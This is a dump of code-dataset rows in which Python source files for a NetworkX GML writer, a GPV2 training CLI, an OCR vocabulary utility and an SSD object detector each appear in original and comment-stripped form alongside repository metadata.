if epos != -1 and text.find(".", 0, epos) == -1:
text = text[:epos] + "." + text[epos:]
if key == "label":
yield indent + key + ' "' + text + '"'
else:
yield indent + key + " " + text
elif isinstance(value, dict):
yield indent + key + " ["
next_indent = indent + " "
for key, value in value.items():
yield from stringize(key, value, (), next_indent)
yield indent + ']'
elif isinstance(value, (list, tuple)) and key != 'label' \
and value and not in_list:
if len(value) == 1:
yield indent + key + ' ' + f'"{LIST_START_VALUE}"'
for val in value:
yield from stringize(key, val, (), indent, True)
else:
if stringizer:
try:
value = stringizer(value)
except ValueError as e:
raise NetworkXError(
f"{value!r} cannot be converted into a string"
) from e
if not isinstance(value, str):
raise NetworkXError(f"{value!r} is not a string")
yield indent + key + ' "' + escape(value) + '"'
multigraph = G.is_multigraph()
yield "graph ["
# Output graph attributes
if G.is_directed():
yield " directed 1"
if multigraph:
yield " multigraph 1"
ignored_keys = {"directed", "multigraph", "node", "edge"}
for attr, value in G.graph.items():
yield from stringize(attr, value, ignored_keys, " ")
# Output node data
node_id = dict(zip(G, range(len(G))))
ignored_keys = {"id", "label"}
for node, attrs in G.nodes.items():
yield " node ["
yield " id " + str(node_id[node])
yield from stringize("label", node, (), " ")
for attr, value in attrs.items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
# Output edge data
ignored_keys = {"source", "target"}
kwargs = {"data": True}
if multigraph:
ignored_keys.add("key")
kwargs["keys"] = True
for e in G.edges(**kwargs):
yield " edge ["
yield " source " + str(node_id[e[0]])
yield " target " + str(node_id[e[1]])
if multigraph:
yield from stringize("key", e[2], (), " ")
for attr, value in e[-1].items():
yield from stringize(attr, value, ignored_keys, " ")
yield " ]"
yield "]"
@open_file(1, mode="wb")
def write_gml(G, path, stringizer=None):
for line in generate_gml(G, stringizer):
path.write((line + "\n").encode("ascii"))
| true
| true
|
1c3eab89ad9c859e5a79f47abfdc6eb5e5425323
| 8,200
|
py
|
Python
|
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | 13
|
2022-02-03T00:25:35.000Z
|
2022-03-20T02:36:05.000Z
|
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | null | null | null |
gpv2/experiments/trainer_cli.py
|
allenai/gpv2
|
dd8162a446963ed2c73eb24708580bbbe4491191
|
[
"Apache-2.0"
] | 3
|
2022-01-14T19:15:38.000Z
|
2022-02-11T14:12:52.000Z
|
import logging
from argparse import ArgumentParser
from gpv2.data.dataset import Task
from gpv2.data.gpv_datasets import GpvDataset, CocoCategories
from gpv2.model.model import BeamSearchSpec
from gpv2.train import evaluator
from gpv2.train.evaluator import ResultKey
from gpv2.train.runner import DataLoaderBuilder
from gpv2.train.trainer import Trainer, TrainerDataset, EvaluationSetup, RunArgs
from gpv2.utils.pytorch_utils import get_devices
def add_train_args(parser: ArgumentParser, batch_size=32, num_workers=6,
epochs=8, tasks="all", clip_grad_norm=None, find_unused_parameters=True):
"""Add a bunch of args to `parser` that are likely to be useful for multiple models
The extra args specify the defaults
"""
parser.add_argument("--task", nargs="+", default=tasks,
help="Tasks for train on")
parser.add_argument("--sce", action="store_true")
# Performance args
parser.add_argument("--device", nargs="+", default=None,
help="List of integer GPU devices to train on")
parser.add_argument("--dist_port", default=None, type=int,
help="Port to syn distributed training on")
parser.add_argument("--grad_accumulation", type=int, default=1,
help="Accumulate gradients over n step, the effective batch_size will "
"be unchanged")
parser.add_argument("--force_one_worker", action="store_true",
help="For debugging, run distributed code even only 1 device is given")
parser.add_argument("--nopin_memory", action="store_true",
help="Turn off memory pinning")
parser.add_argument("--num_workers", default=num_workers, type=int,
help="Number of workers to use")
parser.add_argument("--find_unused_parameters", action="store_true")
# Other training args
parser.add_argument("--clip_grad_norm", default=clip_grad_norm, type=float)
parser.add_argument("--batch_size", default=batch_size, type=int)
parser.add_argument("--epochs", default=epochs, type=int)
parser.add_argument("--debug", choices=["tiny", "small", "med", "large"], default=None)
# Output args
parser.add_argument("--eval_start", action="store_true")
parser.add_argument("--override", action="store_true")
parser.add_argument("--output_dir")
def run_train(args, model, **kwargs):
trainer = get_trainer_from_args(args, **kwargs)
run_trainer_from_args(trainer, model, args)
COCO_EVAL = {
Task.VQA: EvaluationSetup(
evaluator.VqaEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 10))
),
Task.CAPTIONING: EvaluationSetup(
evaluator.CaptionEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 30))
),
Task.LOCALIZATION: EvaluationSetup(
evaluator.LocalizationEvaluator(),
dict(beam_search_spec=None)
),
Task.CLS: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
Task.CLS_IN_CONTEXT: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
}
def get_trainer_from_args(
args, optimizer, logging_ema=0.99, sync_monitor=True, scheduler=None) -> Trainer:
batch_size, num_workers = args.batch_size, args.num_workers
if args.debug:
dbg_batch_size, dbg_num_workers = {
"tiny": (2, 0),
"small": (8, 0),
"med": (24, 4),
"large": (60, 4),
}[args.debug]
if not hasattr(args, "batch_size_not_default"):
batch_size = dbg_batch_size
if not hasattr(args, "num_workers_not_default"):
num_workers = dbg_num_workers
logging.info(f"batch size={batch_size}")
logging.info(f"num_workers={num_workers}")
logging.info(f"lr={args.lr}")
if args.grad_accumulation != 1:
logging.info(f"grad acc={args.grad_accumulation}")
train_datasets = []
eval_datasets = []
tasks = {} # Use a dictionary to preserve ordering with uniqueness
for dataset in args.task:
if dataset == "all":
tasks.update({x: None for x in Task})
elif dataset == "non-cls":
tasks.update({x: None for x in [Task.VQA, Task.CAPTIONING, Task.DETECTION]})
else:
tasks[Task(dataset)] = None
for task in tasks:
train_datasets.append(TrainerDataset(
GpvDataset(task, "train", args.sce), str(task) + "-tr", eval_setup=COCO_EVAL[task]))
eval_datasets.append(TrainerDataset(
GpvDataset(task, "val", args.sce), str(task) + "-val", eval_setup=COCO_EVAL[task]))
best_model_key = [
ResultKey("accuracy", dataset_name="cls-val"),
ResultKey("accuracy", dataset_name="cic-val"),
ResultKey("score", dataset_name="vqa-val"),
ResultKey("cider", dataset_name="cap-val"),
ResultKey("AP", dataset_name="det-val"),
ResultKey("accuracy", dataset_name="webqa-val"),
]
best_model_key = [x for x in best_model_key if any(x.dataset_name.startswith(str(t)) for t in tasks)]
if args.debug == "tiny":
for x in train_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 0
for x in eval_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 4
elif args.debug == "small":
for x in train_datasets:
x.dataset.sample = 120
x.eval_sample = 30
for x in eval_datasets:
x.dataset.sample = 120
x.eval_sample = 30
elif args.debug == "med":
for x in train_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
for x in eval_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
elif args.debug == "large":
for x in train_datasets:
x.dataset.sample = 10000
x.eval_sample = 2000
for x in eval_datasets:
x.eval_sample = 2000
else:
for x in train_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 5000
else:
x.eval_sample = 8000
for x in eval_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 8000
else:
x.eval_sample = 12000
train_loader = DataLoaderBuilder(batch_size, num_workers, not args.nopin_memory,
prefetch_factor=2, persist_workers=num_workers > 0)
# other_log specifies additional tensorboard logging outputs, we use it to
# have a second tab with results grouped by train/eval rather than by dataset
other_log = {}
evals = [(x, True) for x in train_datasets] + [(x, False) for x in eval_datasets]
for ds, is_train in evals:
task = ds.dataset.task
if task == Task.CAPTIONING:
metric_name, name = "cider", "cider"
k = evaluator.ResultKey(metric_name="bleu4", dataset_name=ds.get_name())
other_log[k] = "bleu4"
elif task == Task.CLS:
metric_name, name = "accuracy", "cls"
elif task == Task.VQA:
metric_name, name = "score", "vqa"
elif task == Task.LOCALIZATION:
metric_name, name = "AP", "loc"
elif task == Task.CLS_IN_CONTEXT:
metric_name, name = "accuracy", "ident"
elif task == Task.WEBQA:
metric_name, name = "accuracy", "webqa"
elif task == Task.HOI:
continue
else:
raise NotImplementedError(task)
name = f"train-evals/{name}" if is_train else f"val-evals/{name}"
other_log[evaluator.ResultKey(metric_name=metric_name, dataset_name=ds.get_name())] = name
trainer = Trainer(
train_datasets,
eval_datasets,
optimizer,
train_loader=train_loader,
step_schedule=scheduler,
save_evaluation_results=True,
save_prediction_samples=500,
train_val_log=list(other_log.items()),
find_unused_parameters=not args.find_unused_parameters,
epochs=args.epochs,
best_model_key=best_model_key,
clip_grad_norm=args.clip_grad_norm,
tb_log_intervals=20,
checkpoint=True,
sync_monitor=sync_monitor,
eval_at_start=args.eval_start,
loss_logging_ema=logging_ema,
monitor_ema=logging_ema,
)
return trainer
def run_trainer_from_args(trainer, model, args):
devices = RunArgs.build(get_devices(args.device), args.force_one_worker, args.grad_accumulation)
trainer.train(model, args.output_dir, devices, override=args.override)
| 34.745763
| 103
| 0.682195
|
import logging
from argparse import ArgumentParser
from gpv2.data.dataset import Task
from gpv2.data.gpv_datasets import GpvDataset, CocoCategories
from gpv2.model.model import BeamSearchSpec
from gpv2.train import evaluator
from gpv2.train.evaluator import ResultKey
from gpv2.train.runner import DataLoaderBuilder
from gpv2.train.trainer import Trainer, TrainerDataset, EvaluationSetup, RunArgs
from gpv2.utils.pytorch_utils import get_devices
def add_train_args(parser: ArgumentParser, batch_size=32, num_workers=6,
epochs=8, tasks="all", clip_grad_norm=None, find_unused_parameters=True):
parser.add_argument("--task", nargs="+", default=tasks,
help="Tasks for train on")
parser.add_argument("--sce", action="store_true")
parser.add_argument("--device", nargs="+", default=None,
help="List of integer GPU devices to train on")
parser.add_argument("--dist_port", default=None, type=int,
help="Port to syn distributed training on")
parser.add_argument("--grad_accumulation", type=int, default=1,
help="Accumulate gradients over n step, the effective batch_size will "
"be unchanged")
parser.add_argument("--force_one_worker", action="store_true",
help="For debugging, run distributed code even only 1 device is given")
parser.add_argument("--nopin_memory", action="store_true",
help="Turn off memory pinning")
parser.add_argument("--num_workers", default=num_workers, type=int,
help="Number of workers to use")
parser.add_argument("--find_unused_parameters", action="store_true")
parser.add_argument("--clip_grad_norm", default=clip_grad_norm, type=float)
parser.add_argument("--batch_size", default=batch_size, type=int)
parser.add_argument("--epochs", default=epochs, type=int)
parser.add_argument("--debug", choices=["tiny", "small", "med", "large"], default=None)
parser.add_argument("--eval_start", action="store_true")
parser.add_argument("--override", action="store_true")
parser.add_argument("--output_dir")
def run_train(args, model, **kwargs):
trainer = get_trainer_from_args(args, **kwargs)
run_trainer_from_args(trainer, model, args)
COCO_EVAL = {
Task.VQA: EvaluationSetup(
evaluator.VqaEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 10))
),
Task.CAPTIONING: EvaluationSetup(
evaluator.CaptionEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 30))
),
Task.LOCALIZATION: EvaluationSetup(
evaluator.LocalizationEvaluator(),
dict(beam_search_spec=None)
),
Task.CLS: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
Task.CLS_IN_CONTEXT: EvaluationSetup(
evaluator.ClsEvaluator(),
dict(beam_search_spec=BeamSearchSpec(1, 5), answer_options=CocoCategories())
),
}
def get_trainer_from_args(
args, optimizer, logging_ema=0.99, sync_monitor=True, scheduler=None) -> Trainer:
batch_size, num_workers = args.batch_size, args.num_workers
if args.debug:
dbg_batch_size, dbg_num_workers = {
"tiny": (2, 0),
"small": (8, 0),
"med": (24, 4),
"large": (60, 4),
}[args.debug]
if not hasattr(args, "batch_size_not_default"):
batch_size = dbg_batch_size
if not hasattr(args, "num_workers_not_default"):
num_workers = dbg_num_workers
logging.info(f"batch size={batch_size}")
logging.info(f"num_workers={num_workers}")
logging.info(f"lr={args.lr}")
if args.grad_accumulation != 1:
logging.info(f"grad acc={args.grad_accumulation}")
train_datasets = []
eval_datasets = []
tasks = {}
for dataset in args.task:
if dataset == "all":
tasks.update({x: None for x in Task})
elif dataset == "non-cls":
tasks.update({x: None for x in [Task.VQA, Task.CAPTIONING, Task.DETECTION]})
else:
tasks[Task(dataset)] = None
for task in tasks:
train_datasets.append(TrainerDataset(
GpvDataset(task, "train", args.sce), str(task) + "-tr", eval_setup=COCO_EVAL[task]))
eval_datasets.append(TrainerDataset(
GpvDataset(task, "val", args.sce), str(task) + "-val", eval_setup=COCO_EVAL[task]))
best_model_key = [
ResultKey("accuracy", dataset_name="cls-val"),
ResultKey("accuracy", dataset_name="cic-val"),
ResultKey("score", dataset_name="vqa-val"),
ResultKey("cider", dataset_name="cap-val"),
ResultKey("AP", dataset_name="det-val"),
ResultKey("accuracy", dataset_name="webqa-val"),
]
best_model_key = [x for x in best_model_key if any(x.dataset_name.startswith(str(t)) for t in tasks)]
if args.debug == "tiny":
for x in train_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 0
for x in eval_datasets:
x.dataset.sample = 5
if x.eval_sample != 0:
x.eval_sample = 4
elif args.debug == "small":
for x in train_datasets:
x.dataset.sample = 120
x.eval_sample = 30
for x in eval_datasets:
x.dataset.sample = 120
x.eval_sample = 30
elif args.debug == "med":
for x in train_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
for x in eval_datasets:
x.dataset.sample = 2000
x.eval_sample = 500
elif args.debug == "large":
for x in train_datasets:
x.dataset.sample = 10000
x.eval_sample = 2000
for x in eval_datasets:
x.eval_sample = 2000
else:
for x in train_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 5000
else:
x.eval_sample = 8000
for x in eval_datasets:
if x.dataset.task == Task.CAPTIONING:
x.eval_sample = 8000
else:
x.eval_sample = 12000
train_loader = DataLoaderBuilder(batch_size, num_workers, not args.nopin_memory,
prefetch_factor=2, persist_workers=num_workers > 0)
other_log = {}
evals = [(x, True) for x in train_datasets] + [(x, False) for x in eval_datasets]
for ds, is_train in evals:
task = ds.dataset.task
if task == Task.CAPTIONING:
metric_name, name = "cider", "cider"
k = evaluator.ResultKey(metric_name="bleu4", dataset_name=ds.get_name())
other_log[k] = "bleu4"
elif task == Task.CLS:
metric_name, name = "accuracy", "cls"
elif task == Task.VQA:
metric_name, name = "score", "vqa"
elif task == Task.LOCALIZATION:
metric_name, name = "AP", "loc"
elif task == Task.CLS_IN_CONTEXT:
metric_name, name = "accuracy", "ident"
elif task == Task.WEBQA:
metric_name, name = "accuracy", "webqa"
elif task == Task.HOI:
continue
else:
raise NotImplementedError(task)
name = f"train-evals/{name}" if is_train else f"val-evals/{name}"
other_log[evaluator.ResultKey(metric_name=metric_name, dataset_name=ds.get_name())] = name
trainer = Trainer(
train_datasets,
eval_datasets,
optimizer,
train_loader=train_loader,
step_schedule=scheduler,
save_evaluation_results=True,
save_prediction_samples=500,
train_val_log=list(other_log.items()),
find_unused_parameters=not args.find_unused_parameters,
epochs=args.epochs,
best_model_key=best_model_key,
clip_grad_norm=args.clip_grad_norm,
tb_log_intervals=20,
checkpoint=True,
sync_monitor=sync_monitor,
eval_at_start=args.eval_start,
loss_logging_ema=logging_ema,
monitor_ema=logging_ema,
)
return trainer
def run_trainer_from_args(trainer, model, args):
devices = RunArgs.build(get_devices(args.device), args.force_one_worker, args.grad_accumulation)
trainer.train(model, args.output_dir, devices, override=args.override)
| true
| true
|
1c3eac835ba7397893099136aa6bcebacad7b24a
| 1,911
|
py
|
Python
|
Source/utils/labelmaps.py
|
YacobBY/ICDAR2019-ArT-Recognition-Alchemy
|
911c572c2aff4599a74b7974d46ef4cfb17078b9
|
[
"MIT"
] | 209
|
2019-08-28T10:42:54.000Z
|
2022-01-10T13:49:32.000Z
|
Source/utils/labelmaps.py
|
wangxiong101/ICDAR2019-ArT-Recognition-Alchemy
|
5b03f73386f0a45ecc498f653d96012caa4a0c76
|
[
"MIT"
] | 16
|
2019-09-01T05:12:39.000Z
|
2021-03-28T04:00:24.000Z
|
Source/utils/labelmaps.py
|
wangxiong101/ICDAR2019-ArT-Recognition-Alchemy
|
5b03f73386f0a45ecc498f653d96012caa4a0c76
|
[
"MIT"
] | 76
|
2019-09-02T03:11:09.000Z
|
2021-11-11T04:42:31.000Z
|
from __future__ import absolute_import
import string
from . import to_torch, to_numpy
def get_vocabulary(voc_type, EOS='EOS', PADDING='PADDING', UNKNOWN='UNKNOWN'):
'''
voc_type: str: one of 'LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS'
'''
voc = None
types = ['LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS']
if voc_type == 'LOWERCASE':
voc = list(string.digits + string.ascii_lowercase)
elif voc_type == 'ALLCASES':
voc = list(string.digits + string.ascii_letters)
elif voc_type == 'ALLCASES_SYMBOLS':
voc = list(string.printable[:-6])
elif voc_type == 'LOWERCASE_SYMBOLS':
voc = list(string.digits + string.ascii_lowercase +
string.printable[-38:-6])
else:
raise KeyError(
'voc_type must be one of "LOWERCASE", "ALLCASES", "ALLCASES_SYMBOLS"')
# update the voc with specifical chars
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
# special characters for IC19 competition
# special = '∑,ºóʃüεäèиíöλá:®é·#' # high frequency in the public training set
# voc.extend(list(special))
return voc
# param voc: the list of vocabulary
def char2id(voc):
return dict(zip(voc, range(len(voc))))
def id2char(voc):
return dict(zip(range(len(voc)), voc))
def labels2strs(labels, id2char, char2id):
# labels: batch_size x len_seq
assert labels.dim() == 2
labels = to_numpy(labels)
strings = []
batch_size = labels.shape[0]
for i in range(batch_size):
label = labels[i]
string = []
for l in label:
if l == char2id['EOS']:
break
else:
string.append(id2char[l])
string = ''.join(string)
strings.append(string)
return strings
| 28.102941
| 91
| 0.600733
|
from __future__ import absolute_import
import string
from . import to_torch, to_numpy
def get_vocabulary(voc_type, EOS='EOS', PADDING='PADDING', UNKNOWN='UNKNOWN'):
voc = None
types = ['LOWERCASE', 'ALLCASES', 'ALLCASES_SYMBOLS', 'LOWERCASE_SYMBOLS']
if voc_type == 'LOWERCASE':
voc = list(string.digits + string.ascii_lowercase)
elif voc_type == 'ALLCASES':
voc = list(string.digits + string.ascii_letters)
elif voc_type == 'ALLCASES_SYMBOLS':
voc = list(string.printable[:-6])
elif voc_type == 'LOWERCASE_SYMBOLS':
voc = list(string.digits + string.ascii_lowercase +
string.printable[-38:-6])
else:
raise KeyError(
'voc_type must be one of "LOWERCASE", "ALLCASES", "ALLCASES_SYMBOLS"')
voc.append(EOS)
voc.append(PADDING)
voc.append(UNKNOWN)
oc):
return dict(zip(voc, range(len(voc))))
def id2char(voc):
return dict(zip(range(len(voc)), voc))
def labels2strs(labels, id2char, char2id):
assert labels.dim() == 2
labels = to_numpy(labels)
strings = []
batch_size = labels.shape[0]
for i in range(batch_size):
label = labels[i]
string = []
for l in label:
if l == char2id['EOS']:
break
else:
string.append(id2char[l])
string = ''.join(string)
strings.append(string)
return strings
| true
| true
|
1c3ead84bd5d5e28185269b23e0aa67b71bef3ff
| 7,632
|
py
|
Python
|
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
ssd.py
|
kshramt/ssd.pytorch
|
91214ba98c282663c117a4f3c691464460b8fa16
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from layers import *
from data import voc, coco
import os
class SSD(nn.Module):
"""Single Shot Multibox Architecture
The network is composed of a base VGG network followed by the
added multibox conv layers. Each multibox layer branches into
1) conv2d for class conf scores
2) conv2d for localization predictions
3) associated priorbox layer to produce default bounding
boxes specific to the layer's feature map size.
See: https://arxiv.org/pdf/1512.02325.pdf for more details.
Args:
phase: (string) Can be "test" or "train"
size: input image size
base: VGG16 layers for input, size of either 300 or 500
extras: extra layers that feed to multibox loc and conf layers
head: "multibox head" consists of loc and conf conv layers
"""
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = (coco, voc)[num_classes == 21]
self.priorbox = PriorBox(self.cfg)
self.priors = self.priorbox.forward()
self.size = size
# SSD network
self.vgg = nn.ModuleList(base)
# Layer learns to scale the l2 normalized features from conv4_3
self.L2Norm = L2Norm(512, 20)
self.extras = nn.ModuleList(extras)
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
def forward(self, x):
"""Applies network layers and ops on input image(s) x.
Args:
x: input image or batch of images. Shape: [batch,3,300,300].
Return:
Depending on phase:
test:
tensor of output class label predictions,
confidence score, and corresponding location predictions for
each object detected. Shape: [batch,topk,7]
train:
list of concat outputs from:
1: confidence layers, Shape: [batch*num_priors,num_classes]
2: localization layers, Shape: [batch,num_priors*4]
3: priorbox layers, Shape: [2,num_priors*4]
"""
sources = list()
loc = list()
conf = list()
# apply vgg up to conv4_3 relu
for k in range(23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
# apply vgg up to fc7
for k in range(23, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
# apply extra layers and cache source layer outputs
for k, v in enumerate(self.extras):
x = F.relu(v(x), inplace=True)
if k % 2 == 1:
sources.append(x)
# apply multibox head to source layers
for (x, l, c) in zip(sources, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
conf.append(c(x).permute(0, 2, 3, 1).contiguous())
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4), # loc preds
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)), # conf preds
self.priors.type(type(x.data)) # default boxes
)
else:
output = (
loc.view(loc.size(0), -1, 4),
conf.view(conf.size(0), -1, self.num_classes),
self.priors
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
if ext == '.pkl' or '.pth':
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file,
map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
# This function is derived from torchvision VGG make_layers()
# https://github.com/pytorch/vision/blob/master/torchvision/models/vgg.py
def vgg(cfg, i, batch_norm=False):
layers = []
in_channels = i
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'C':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
# Extra layers added to VGG for feature scaling
layers = []
in_channels = i
flag = False
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
loc_layers = []
conf_layers = []
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
loc_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
'300': [4, 6, 6, 6, 4, 4], # number of boxes per feature map location
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
mbox[str(size)], num_classes)
return SSD(phase, size, base_, extras_, head_, num_classes)
| 36.342857
| 79
| 0.550183
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from layers import *
from data import voc, coco
import os
class SSD(nn.Module):
def __init__(self, phase, size, base, extras, head, num_classes):
super(SSD, self).__init__()
self.phase = phase
self.num_classes = num_classes
self.cfg = (coco, voc)[num_classes == 21]
self.priorbox = PriorBox(self.cfg)
self.priors = self.priorbox.forward()
self.size = size
self.vgg = nn.ModuleList(base)
self.L2Norm = L2Norm(512, 20)
self.extras = nn.ModuleList(extras)
self.loc = nn.ModuleList(head[0])
self.conf = nn.ModuleList(head[1])
if phase == 'test':
self.softmax = nn.Softmax(dim=-1)
self.detect = Detect(num_classes, 0, 200, 0.01, 0.45)
def forward(self, x):
sources = list()
loc = list()
conf = list()
for k in range(23):
x = self.vgg[k](x)
s = self.L2Norm(x)
sources.append(s)
for k in range(23, len(self.vgg)):
x = self.vgg[k](x)
sources.append(x)
for k, v in enumerate(self.extras):
x = F.relu(v(x), inplace=True)
if k % 2 == 1:
sources.append(x)
for (x, l, c) in zip(sources, self.loc, self.conf):
loc.append(l(x).permute(0, 2, 3, 1).contiguous())
conf.append(c(x).permute(0, 2, 3, 1).contiguous())
loc = torch.cat([o.view(o.size(0), -1) for o in loc], 1)
conf = torch.cat([o.view(o.size(0), -1) for o in conf], 1)
if self.phase == "test":
output = self.detect(
loc.view(loc.size(0), -1, 4),
self.softmax(conf.view(conf.size(0), -1,
self.num_classes)),
self.priors.type(type(x.data))
)
else:
output = (
loc.view(loc.size(0), -1, 4),
conf.view(conf.size(0), -1, self.num_classes),
self.priors
)
return output
def load_weights(self, base_file):
other, ext = os.path.splitext(base_file)
if ext == '.pkl' or '.pth':
print('Loading weights into state dict...')
self.load_state_dict(torch.load(base_file,
map_location=lambda storage, loc: storage))
print('Finished!')
else:
print('Sorry only .pth and .pkl files supported.')
def vgg(cfg, i, batch_norm=False):
layers = []
in_channels = i
for v in cfg:
if v == 'M':
layers += [nn.MaxPool2d(kernel_size=2, stride=2)]
elif v == 'C':
layers += [nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)]
else:
conv2d = nn.Conv2d(in_channels, v, kernel_size=3, padding=1)
if batch_norm:
layers += [conv2d, nn.BatchNorm2d(v), nn.ReLU(inplace=True)]
else:
layers += [conv2d, nn.ReLU(inplace=True)]
in_channels = v
pool5 = nn.MaxPool2d(kernel_size=3, stride=1, padding=1)
conv6 = nn.Conv2d(512, 1024, kernel_size=3, padding=6, dilation=6)
conv7 = nn.Conv2d(1024, 1024, kernel_size=1)
layers += [pool5, conv6,
nn.ReLU(inplace=True), conv7, nn.ReLU(inplace=True)]
return layers
def add_extras(cfg, i, batch_norm=False):
layers = []
in_channels = i
flag = False
for k, v in enumerate(cfg):
if in_channels != 'S':
if v == 'S':
layers += [nn.Conv2d(in_channels, cfg[k + 1],
kernel_size=(1, 3)[flag], stride=2, padding=1)]
else:
layers += [nn.Conv2d(in_channels, v, kernel_size=(1, 3)[flag])]
flag = not flag
in_channels = v
return layers
def multibox(vgg, extra_layers, cfg, num_classes):
loc_layers = []
conf_layers = []
vgg_source = [21, -2]
for k, v in enumerate(vgg_source):
loc_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(vgg[v].out_channels,
cfg[k] * num_classes, kernel_size=3, padding=1)]
for k, v in enumerate(extra_layers[1::2], 2):
loc_layers += [nn.Conv2d(v.out_channels, cfg[k]
* 4, kernel_size=3, padding=1)]
conf_layers += [nn.Conv2d(v.out_channels, cfg[k]
* num_classes, kernel_size=3, padding=1)]
return vgg, extra_layers, (loc_layers, conf_layers)
base = {
'300': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'C', 512, 512, 512, 'M',
512, 512, 512],
'512': [],
}
extras = {
'300': [256, 'S', 512, 128, 'S', 256, 128, 256, 128, 256],
'512': [],
}
mbox = {
'300': [4, 6, 6, 6, 4, 4],
'512': [],
}
def build_ssd(phase, size=300, num_classes=21):
if phase != "test" and phase != "train":
print("ERROR: Phase: " + phase + " not recognized")
return
if size != 300:
print("ERROR: You specified size " + repr(size) + ". However, " +
"currently only SSD300 (size=300) is supported!")
return
base_, extras_, head_ = multibox(vgg(base[str(size)], 3),
add_extras(extras[str(size)], 1024),
